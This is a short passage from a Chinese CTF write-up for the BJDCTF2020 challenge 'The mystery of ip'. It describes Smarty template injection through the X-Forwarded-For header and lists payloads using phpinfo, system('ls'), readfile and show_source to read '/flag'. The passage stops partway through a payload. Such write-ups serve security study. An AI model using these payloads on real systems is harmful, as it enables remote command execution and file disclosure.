[BJDCTF2020]The mystery of ip

知識點 SSTI smarty 抓包，根據題目猜想X-Forwarded-For處可能有問題，測試了一下，存在模板注入   測試了一下，是smarty注入 smarty注入payload {if phpinfo()}{/if} {if system('ls')}{/if} { readfile('/flag') } {if show_source('/flag')}{/if} {if system

>>阅读原文<<